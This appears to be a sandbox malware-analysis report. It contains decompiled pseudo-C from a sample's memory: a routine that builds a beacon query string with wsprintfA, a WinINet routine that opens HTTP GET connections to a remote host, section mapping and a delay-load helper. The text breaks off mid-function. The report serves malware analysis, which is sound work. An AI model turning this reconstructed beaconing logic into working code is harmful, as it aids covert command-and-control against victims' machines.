                            • Instruction ID: a8434760b72dced533d6b1e45b9ae802b84f7c41c3403426f2e3ea1f70bc4997
                            • Opcode Fuzzy Hash: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
                            • Instruction Fuzzy Hash: A0310775A0121ADBDB14CF59C994AAEB7F4FF04310F24407AD902EB3A0E778EA41DB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E00401F78(void** __esi, PVOID* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _v16;
                            				long _t13;
                            
                            				_v16 = 0;
                            				asm("stosd");
                            				_v8 = 0;
                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                            				if(_t13 < 0) {
                            					_push(_t13);
                            					return __esi[6]();
                            				}
                            				return 0;
                            			}
                            Instruction addresses (one per statement line of the C-Code above, in listing order; 0x00000000 marks a line with no address): 0x00401f8a, 0x00401f90, 0x00401f9e, 0x00401fa5, 0x00401faa, 0x00401fb0, 0x00000000, 0x00401fb1, 0x00000000

                            APIs
                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E07,00000002,00000000,?,?,00000000,?,?,00401E07,00000002), ref: 00401FA5
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction ID: c55f902479581699a0c324a5f7b4548b03dce4ae1f92d5d63f21deca0fc447f7
                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction Fuzzy Hash: B3F012B590420DBFDB119FA5CC85C9FBBBDEB44394B104A3AB552E11A0D6309E089A60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 69%
                            			E006D3643(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                            				intOrPtr _v4;
                            				intOrPtr _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				void* _v48;
                            				intOrPtr _v56;
                            				void* __edi;
                            				intOrPtr _t30;
                            				void* _t31;
                            				intOrPtr _t33;
                            				intOrPtr _t34;
                            				intOrPtr _t35;
                            				intOrPtr _t36;
                            				intOrPtr _t37;
                            				void* _t40;
                            				intOrPtr _t41;
                            				int _t44;
                            				intOrPtr _t45;
                            				int _t48;
                            				void* _t49;
                            				intOrPtr _t53;
                            				intOrPtr _t59;
                            				intOrPtr _t63;
                            				intOrPtr* _t65;
                            				void* _t66;
                            				intOrPtr _t71;
                            				intOrPtr _t77;
                            				intOrPtr _t80;
                            				intOrPtr _t83;
                            				int _t86;
                            				intOrPtr _t88;
                            				int _t91;
                            				intOrPtr _t93;
                            				int _t96;
                            				void* _t98;
                            				void* _t99;
                            				void* _t103;
                            				void* _t105;
                            				void* _t106;
                            				intOrPtr _t107;
                            				long _t109;
                            				intOrPtr* _t110;
                            				intOrPtr* _t111;
                            				long _t112;
                            				int _t113;
                            				void* _t114;
                            				void* _t115;
                            				void* _t116;
                            				void* _t119;
                            				void* _t120;
                            				void* _t122;
                            				void* _t123;
                            
                            				_t103 = __edx;
                            				_t99 = __ecx;
                            				_t120 =  &_v16;
                            				_t112 = __eax;
                            				_t30 =  *0x6da3e0; // 0x14a9be8
                            				_v4 = _t30;
                            				_v8 = 8;
                            				_t31 = RtlAllocateHeap( *0x6da2d8, 0, 0x800); // executed
                            				_t98 = _t31;
                            				if(_t98 != 0) {
                            					if(_t112 == 0) {
                            						_t112 = GetTickCount();
                            					}
                            					_t33 =  *0x6da018; // 0xc9f186aa
                            					asm("bswap eax");
                            					_t34 =  *0x6da014; // 0x3a87c8cd
                            					asm("bswap eax");
                            					_t35 =  *0x6da010; // 0xd8d2f808
                            					asm("bswap eax");
                            					_t36 =  *0x6da00c; // 0xeec43f25
                            					asm("bswap eax");
                            					_t37 =  *0x6da348; // 0xdcd5a8
                            					_t3 = _t37 + 0x6db62b; // 0x74666f73
                            					_t113 = wsprintfA(_t98, _t3, 2, 0x3d186, _t36, _t35, _t34, _t33,  *0x6da02c,  *0x6da004, _t112);
                            					_t40 = E006D1308();
                            					_t41 =  *0x6da348; // 0xdcd5a8
                            					_t4 = _t41 + 0x6db66b; // 0x74707526
                            					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
                            					_t122 = _t120 + 0x38;
                            					_t114 = _t113 + _t44;
                            					if(_a12 != 0) {
                            						_t93 =  *0x6da348; // 0xdcd5a8
                            						_t8 = _t93 + 0x6db676; // 0x732526
                            						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
                            						_t122 = _t122 + 0xc;
                            						_t114 = _t114 + _t96;
                            					}
                            					_t45 =  *0x6da348; // 0xdcd5a8
                            					_t10 = _t45 + 0x6db2de; // 0x74636126
                            					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
                            					_t123 = _t122 + 0xc;
                            					_t115 = _t114 + _t48; // executed
                            					_t49 = E006D3DE0(_t99); // executed
                            					_t105 = _t49;
                            					if(_t105 != 0) {
                            						_t88 =  *0x6da348; // 0xdcd5a8
                            						_t12 = _t88 + 0x6db8c2; // 0x736e6426
                            						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
                            						_t123 = _t123 + 0xc;
                            						_t115 = _t115 + _t91;
                            						HeapFree( *0x6da2d8, 0, _t105);
                            					}
                            					_t106 = E006D3ACA();
                            					if(_t106 != 0) {
                            						_t83 =  *0x6da348; // 0xdcd5a8
                            						_t14 = _t83 + 0x6db8ca; // 0x6f687726
                            						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
                            						_t123 = _t123 + 0xc;
                            						_t115 = _t115 + _t86;
                            						HeapFree( *0x6da2d8, 0, _t106);
                            					}
                            					_t107 =  *0x6da3cc; // 0x14a9600
                            					_a20 = E006D4B69(0x6da00a, _t107 + 4);
                            					_t53 =  *0x6da36c; // 0x14a95b0
                            					_t109 = 0;
                            					if(_t53 != 0) {
                            						_t80 =  *0x6da348; // 0xdcd5a8
                            						_t17 = _t80 + 0x6db889; // 0x3d736f26
                            						wsprintfA(_t115 + _t98, _t17, _t53);
                            					}
                            					if(_a20 != _t109) {
                            						_t116 = RtlAllocateHeap( *0x6da2d8, _t109, 0x800);
                            						if(_t116 != _t109) {
                            							E006D53AE(GetTickCount());
                            							_t59 =  *0x6da3cc; // 0x14a9600
                            							__imp__(_t59 + 0x40);
                            							asm("lock xadd [eax], ecx");
                            							_t63 =  *0x6da3cc; // 0x14a9600
                            							__imp__(_t63 + 0x40);
                            							_t65 =  *0x6da3cc; // 0x14a9600
                            							_t66 = E006D2281(1, _t103, _t98,  *_t65); // executed
                            							_t119 = _t66;
                            							asm("lock xadd [eax], ecx");
                            							if(_t119 != _t109) {
                            								StrTrimA(_t119, 0x6d9280);
                            								_push(_t119);
                            								_t71 = E006D6311();
                            								_v20 = _t71;
                            								if(_t71 != _t109) {
                            									_t110 = __imp__;
                            									 *_t110(_t119, _v8);
                            									 *_t110(_t116, _v8);
                            									_t111 = __imp__;
                            									 *_t111(_t116, _v32);
                            									 *_t111(_t116, _t119);
                            									_t77 = E006D5D05(0xffffffffffffffff, _t116, _v28, _v24); // executed
                            									_v56 = _t77;
                            									if(_t77 != 0 && _t77 != 0x10d2) {
                            										E006D14C6();
                            									}
                            									HeapFree( *0x6da2d8, 0, _v48);
                            									_t109 = 0;
                            								}
                            								HeapFree( *0x6da2d8, _t109, _t119);
                            							}
                            							RtlFreeHeap( *0x6da2d8, _t109, _t116); // executed
                            						}
                            						HeapFree( *0x6da2d8, _t109, _a12);
                            					}
                            					RtlFreeHeap( *0x6da2d8, _t109, _t98); // executed
                            				}
                            				return _v16;
                            			}
                            0x006d3643
                            0x006d3643
                            0x006d3643
                            0x006d3658
                            0x006d365a
                            0x006d365f
                            0x006d3663
                            0x006d366b
                            0x006d3671
                            0x006d3675
                            0x006d367d
                            0x006d3685
                            0x006d3685
                            0x006d3687
                            0x006d3693
                            0x006d36a2
                            0x006d36a7
                            0x006d36aa
                            0x006d36af
                            0x006d36b2
                            0x006d36b7
                            0x006d36ba
                            0x006d36c6
                            0x006d36d3
                            0x006d36d5
                            0x006d36db
                            0x006d36e0
                            0x006d36eb
                            0x006d36ed
                            0x006d36f0
                            0x006d36f6
                            0x006d36f8
                            0x006d3701
                            0x006d370c
                            0x006d370e
                            0x006d3711
                            0x006d3711
                            0x006d3713
                            0x006d3718
                            0x006d3724
                            0x006d3726
                            0x006d3729
                            0x006d372b
                            0x006d3730
                            0x006d3734
                            0x006d3736
                            0x006d373b
                            0x006d3747
                            0x006d3749
                            0x006d3755
                            0x006d3757
                            0x006d3757
                            0x006d3762
                            0x006d3766
                            0x006d3768
                            0x006d376d
                            0x006d3779
                            0x006d377b
                            0x006d3787
                            0x006d3789
                            0x006d3789
                            0x006d378f
                            0x006d37a2
                            0x006d37a6
                            0x006d37ab
                            0x006d37af
                            0x006d37b2
                            0x006d37b7
                            0x006d37c1
                            0x006d37c3
                            0x006d37ca
                            0x006d37e2
                            0x006d37e6
                            0x006d37f2
                            0x006d37f7
                            0x006d3800
                            0x006d3811
                            0x006d3815
                            0x006d381e
                            0x006d3824
                            0x006d382c
                            0x006d3831
                            0x006d383e
                            0x006d3844
                            0x006d3850
                            0x006d3856
                            0x006d3857
                            0x006d385c
                            0x006d3862
                            0x006d3868
                            0x006d386f
                            0x006d3876
                            0x006d387c
                            0x006d3883
                            0x006d3887
                            0x006d3892
                            0x006d3897
                            0x006d389d
                            0x006d38a6
                            0x006d38a6
                            0x006d38b7
                            0x006d38bd
                            0x006d38bd
                            0x006d38c7
                            0x006d38c7
                            0x006d38d5
                            0x006d38d5
                            0x006d38e6
                            0x006d38e6
                            0x006d38f4
                            0x006d38f4
                            0x006d3905

                            APIs
                            • RtlAllocateHeap.NTDLL ref: 006D366B
                            • GetTickCount.KERNEL32 ref: 006D367F
                            • wsprintfA.USER32 ref: 006D36CE
                            • wsprintfA.USER32 ref: 006D36EB
                            • wsprintfA.USER32 ref: 006D370C
                            • wsprintfA.USER32 ref: 006D3724
                            • wsprintfA.USER32 ref: 006D3747
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D3757
                            • wsprintfA.USER32 ref: 006D3779
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D3789
                            • wsprintfA.USER32 ref: 006D37C1
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 006D37DC
                            • GetTickCount.KERNEL32 ref: 006D37EC
                            • RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D3800
                            • RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D381E
                              • Part of subcall function 006D2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22AC
                              • Part of subcall function 006D2281: lstrlen.KERNEL32(00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22B4
                              • Part of subcall function 006D2281: strcpy.NTDLL ref: 006D22CB
                              • Part of subcall function 006D2281: lstrcat.KERNEL32(00000000,00000000), ref: 006D22D6
                              • Part of subcall function 006D2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D22F3
                            • StrTrimA.SHLWAPI(00000000,006D9280,00000000,014A9600), ref: 006D3850
                              • Part of subcall function 006D6311: lstrlen.KERNEL32(014A9BD0,00000000,00000000,00000000,006D385C,00000000), ref: 006D6321
                              • Part of subcall function 006D6311: lstrlen.KERNEL32(?), ref: 006D6329
                              • Part of subcall function 006D6311: lstrcpy.KERNEL32(00000000,014A9BD0), ref: 006D633D
                              • Part of subcall function 006D6311: lstrcat.KERNEL32(00000000,?), ref: 006D6348
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D386F
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D3876
                            • lstrcat.KERNEL32(00000000,?), ref: 006D3883
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D3887
                              • Part of subcall function 006D5D05: WaitForSingleObject.KERNEL32(00000000,74CF81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D5DB7
                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 006D38B7
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 006D38C7
                            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,014A9600), ref: 006D38D5
                            • HeapFree.KERNEL32(00000000,?), ref: 006D38E6
                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 006D38F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
                            • String ID:
                            • API String ID: 186568778-0
                            • Opcode ID: 8116a738976c1a40966ede526cb38612fe77b2eca1a22f29261a5a227f7b2462
                            • Instruction ID: cbfc6029e252b828750ef7d18212267d51c1e427b43d6c5eea7c4a221e54b41f
                            • Opcode Fuzzy Hash: 8116a738976c1a40966ede526cb38612fe77b2eca1a22f29261a5a227f7b2462
                            • Instruction Fuzzy Hash: DC71C571D05210AFC711AFA5EC48E973BEBEB88704B0A151BF909D7331D632DA04DB66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 92%
                            			E006D7B59(void* __eax, void* __ecx, long __esi, char* _a4) {
                            				void _v8;
                            				long _v12;
                            				void _v16;
                            				void* _t34;
                            				void* _t38;
                            				void* _t40;
                            				int _t53;
                            				char* _t56;
                            				long _t57;
                            				void* _t58;
                            				intOrPtr _t59;
                            				long _t65;
                            
                            				_t65 = __esi;
                            				_t58 = __ecx;
                            				_v16 = 0xea60;
                            				__imp__( *(__esi + 4));
                            				_v12 = __eax + __eax;
                            				_t56 = E006D7A71(__eax + __eax + 1);
                            				if(_t56 != 0) {
                            					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
                            					if(_t53 == 0) {
                            						E006D789E(_t56);
                            					} else {
                            						E006D789E( *(__esi + 4));
                            						 *(__esi + 4) = _t56;
                            					}
                            				}
                            				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                            				 *(_t65 + 0x10) = _t34;
                            				if(_t34 == 0 || InternetSetStatusCallback(_t34, E006D7AEE) == 0xffffffff) {
                            					L15:
                            					return GetLastError();
                            				} else {
                            					ResetEvent( *(_t65 + 0x1c));
                            					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                            					 *(_t65 + 0x14) = _t38;
                            					if(_t38 != 0 || GetLastError() == 0x3e5 && E006D2129( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                            						_t59 =  *0x6da348; // 0xdcd5a8
                            						_t15 = _t59 + 0x6db73b; // 0x544547
                            						_v8 = 0x84404000;
                            						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                            						 *(_t65 + 0x18) = _t40;
                            						if(_t40 == 0) {
                            							goto L15;
                            						}
                            						_t57 = 4;
                            						_v12 = _t57;
                            						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                            							_v8 = _v8 | 0x00000100;
                            							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                            						}
                            						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                            							goto L15;
                            						} else {
                            							return 0;
                            						}
                            					} else {
                            						goto L15;
                            					}
                            				}
                            			}
                            0x006d7b59
                            0x006d7b59
                            0x006d7b64
                            0x006d7b6b
                            0x006d7b73
                            0x006d7b7d
                            0x006d7b83
                            0x006d7b8e
                            0x006d7b96
                            0x006d7ba6
                            0x006d7b98
                            0x006d7b9b
                            0x006d7ba0
                            0x006d7ba0
                            0x006d7b96
                            0x006d7bb6
                            0x006d7bbc
                            0x006d7bc1
                            0x006d7caa
                            0x00000000
                            0x006d7bdc
                            0x006d7bdf
                            0x006d7bf2
                            0x006d7bf8
                            0x006d7bfd
                            0x006d7c25
                            0x006d7c38
                            0x006d7c42
                            0x006d7c45
                            0x006d7c4b
                            0x006d7c50
                            0x00000000
                            0x00000000
                            0x006d7c54
                            0x006d7c60
                            0x006d7c71
                            0x006d7c73
                            0x006d7c84
                            0x006d7c84
                            0x006d7c94
                            0x00000000
                            0x006d7ca6
                            0x00000000
                            0x006d7ca6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d7bfd

                            APIs
                            • lstrlen.KERNEL32(?,00000008,74CB4D40), ref: 006D7B6B
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 006D7B8E
                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 006D7BB6
                            • InternetSetStatusCallback.WININET(00000000,006D7AEE), ref: 006D7BCD
                            • ResetEvent.KERNEL32(?), ref: 006D7BDF
                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 006D7BF2
                            • GetLastError.KERNEL32 ref: 006D7BFF
                            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 006D7C45
                            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 006D7C63
                            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 006D7C84
                            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 006D7C90
                            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 006D7CA0
                            • GetLastError.KERNEL32 ref: 006D7CAA
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                            • String ID:
                            • API String ID: 2290446683-0
                            • Opcode ID: 1074ebb4965982a7f0d01457fcab36f422254508676a4b69d6e96eb923f14217
                            • Instruction ID: 7ef53837a5669c8dcaca4425da32167886b71f25b714ffefda52c197aa92a1a0
                            • Opcode Fuzzy Hash: 1074ebb4965982a7f0d01457fcab36f422254508676a4b69d6e96eb923f14217
                            • Instruction Fuzzy Hash: B3417C71D04604BFD7319FA5DD49EAF7BBAEB85B01F10492AF502E12A0F7719A04CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Control-flow graph of E006D7F95 (basic blocks 6d7f95-6d81cf; blocks marked Executed / Not Executed): API calls on the graph are RaiseException (at 6d7ffc, 6d80b7, 6d818e), LoadLibraryA (6d8088), GetLastError (6d8097, 6d816e), InterlockedExchange (6d80d8), LocalAlloc (6d80ec), FreeLibrary (6d810c) and GetProcAddress (6d815e).
                            C-Code - Quality: 51%
                            			E006D7F95(long _a4, long _a8) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				LONG* _v28;
                            				long _v40;
                            				long _v44;
                            				long _v48;
                            				CHAR* _v52;
                            				long _v56;
                            				CHAR* _v60;
                            				long _v64;
                            				signed int* _v68;
                            				char _v72;
                            				signed int _t76;
                            				signed int _t80;
                            				signed int _t81;
                            				intOrPtr* _t82;
                            				intOrPtr* _t83;
                            				intOrPtr* _t85;
                            				intOrPtr* _t90;
                            				intOrPtr* _t95;
                            				intOrPtr* _t98;
                            				struct HINSTANCE__* _t99;
                            				void* _t102;
                            				intOrPtr* _t104;
                            				void* _t115;
                            				long _t116;
                            				void _t125;
                            				void* _t131;
                            				signed short _t133;
                            				struct HINSTANCE__* _t138;
                            				signed int* _t139;
                            
                            				_t139 = _a4;
                            				_v28 = _t139[2] + 0x6d0000;
                            				_t115 = _t139[3] + 0x6d0000;
                            				_t131 = _t139[4] + 0x6d0000;
                            				_v8 = _t139[7];
                            				_v60 = _t139[1] + 0x6d0000;
                            				_v16 = _t139[5] + 0x6d0000;
                            				_v64 = _a8;
                            				_v72 = 0x24;
                            				_v68 = _t139;
                            				_v56 = 0;
                            				asm("stosd");
                            				_v48 = 0;
                            				_v44 = 0;
                            				_v40 = 0;
                            				if(( *_t139 & 0x00000001) == 0) {
                            					_a8 =  &_v72;
                            					RaiseException(0xc06d0057, 0, 1,  &_a8);
                            					return 0;
                            				}
                            				_t138 =  *_v28;
                            				_t76 = _a8 - _t115 >> 2 << 2;
                            				_t133 =  *(_t131 + _t76);
                            				_a4 = _t76;
                            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                            				_v56 = _t80;
                            				_t81 = _t133 + 0x6d0002;
                            				if(_t80 == 0) {
                            					_t81 = _t133 & 0x0000ffff;
                            				}
                            				_v52 = _t81;
                            				_t82 =  *0x6da1c0; // 0x0
                            				_t116 = 0;
                            				if(_t82 == 0) {
                            					L6:
                            					if(_t138 != 0) {
                            						L18:
                            						_t83 =  *0x6da1c0; // 0x0
                            						_v48 = _t138;
                            						if(_t83 != 0) {
                            							_t116 =  *_t83(2,  &_v72);
                            						}
                            						if(_t116 != 0) {
                            							L32:
                            							 *_a8 = _t116;
                            							L33:
                            							_t85 =  *0x6da1c0; // 0x0
                            							if(_t85 != 0) {
                            								_v40 = _v40 & 0x00000000;
                            								_v48 = _t138;
                            								_v44 = _t116;
                            								 *_t85(5,  &_v72);
                            							}
                            							return _t116;
                            						} else {
                            							if(_t139[5] == _t116 || _t139[7] == _t116) {
                            								L27:
                            								_t116 = GetProcAddress(_t138, _v52);
                            								if(_t116 == 0) {
                            									_v40 = GetLastError();
                            									_t90 =  *0x6da1bc; // 0x0
                            									if(_t90 != 0) {
                            										_t116 =  *_t90(4,  &_v72);
                            									}
                            									if(_t116 == 0) {
                            										_a4 =  &_v72;
                            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                            										_t116 = _v44;
                            									}
                            								}
                            								goto L32;
                            							} else {
                            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                            									_t116 =  *(_a4 + _v16);
                            									if(_t116 != 0) {
                            										goto L32;
                            									}
                            								}
                            								goto L27;
                            							}
                            						}
                            					}
                            					_t98 =  *0x6da1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed; _v60 is the DLL name from the delay-load descriptor (this routine matches the CRT's __delayLoadHelper2, i.e. compiler runtime code, not sample-specific logic)
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							// publish the module handle in the descriptor's hmod slot; if another thread already stored the same handle, drop this extra reference
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) { // descriptor field 6 = rvaUnloadIAT: record {next, descriptor} on the unload list
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x6da1b8; // 0x0
										 *_t102 = _t125;
										 *0x6da1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x6da1bc; // 0x0, failure hook (__pfnDliFailureHook2)
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8); // VcppException(ERROR_SEVERITY_ERROR, ERROR_MOD_NOT_FOUND): delay-loaded DLL not found
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72); // dliFailLoadLib: the failure hook may supply a module handle itself
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72); // dliNotePreLoadLibrary: a notify hook may return the module and skip LoadLibraryA
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72); // dliStartProcessing: a non-zero return from the notify hook bypasses the helper entirely
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}



































                            APIs
                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006D800E
                            • LoadLibraryA.KERNELBASE(?), ref: 006D808B
                            • GetLastError.KERNEL32 ref: 006D8097
                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 006D80CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ExceptionRaise$ErrorLastLibraryLoad
                            • String ID: $
                            • API String ID: 948315288-3993045852
                            • Opcode ID: c40a77443548fd6a9ad9214a8d57bb7d1b097c5f0c63ceb5df6936485419e756
                            • Instruction ID: 2c8ad06611e9c28c4123de823ac82c4c83d6737cb5b347414a99e815b03f0891
                            • Opcode Fuzzy Hash: c40a77443548fd6a9ad9214a8d57bb7d1b097c5f0c63ceb5df6936485419e756
                            • Instruction Fuzzy Hash: D7810971E01606AFDB20CF99DC85BAEB7F6BB58310F14802AE515E7350EB70E949CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 183 6d517a-6d51ac memset CreateWaitableTimerA 184 6d532d-6d5333 GetLastError 183->184 185 6d51b2-6d520b _allmul SetWaitableTimer WaitForMultipleObjects 183->185 186 6d5337-6d5341 184->186 187 6d5295-6d529b 185->187 188 6d5211-6d5214 185->188 189 6d529c-6d52a0 187->189 190 6d521f 188->190 191 6d5216 call 6d61fe 188->191 192 6d52b0-6d52b4 189->192 193 6d52a2-6d52aa HeapFree 189->193 195 6d5229 190->195 196 6d521b-6d521d 191->196 192->189 197 6d52b6-6d52c0 CloseHandle 192->197 193->192 198 6d522d-6d5232 195->198 196->190 196->195 197->186 199 6d5245-6d5272 call 6d64a2 198->199 200 6d5234-6d523b 198->200 204 6d5274-6d527f 199->204 205 6d52c2-6d52c7 199->205 200->199 201 6d523d 200->201 201->199 204->198 208 6d5281-6d528c call 6d6821 204->208 206 6d52c9-6d52cf 205->206 207 6d52e6-6d52ee 205->207 206->187 209 6d52d1-6d52e4 call 6d14c6 206->209 210 6d52f4-6d5322 _allmul SetWaitableTimer WaitForMultipleObjects 207->210 214 6d5291 208->214 209->210 210->198 213 6d5328 210->213 213->187 214->187
                            C-Code - Quality: 83%
                            			E006D517A(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                            				void _v48;
                            				long _v52;
                            				struct %anon52 _v60;
                            				char _v72;
                            				long _v76;
                            				void* _v80;
                            				union _LARGE_INTEGER _v84;
                            				struct %anon52 _v92;
                            				void* _v96;
                            				void* _v100;
                            				union _LARGE_INTEGER _v104;
                            				long _v108;
                            				struct %anon52 _v124;
                            				long _v128;
                            				struct %anon52 _t46;
                            				void* _t51;
                            				long _t53;
                            				void* _t54;
                            				struct %anon52 _t61;
                            				long _t65;
                            				struct %anon52 _t66;
                            				intOrPtr _t68;
                            				void* _t69;
                            				void* _t73;
                            				signed int _t74;
                            				void* _t76;
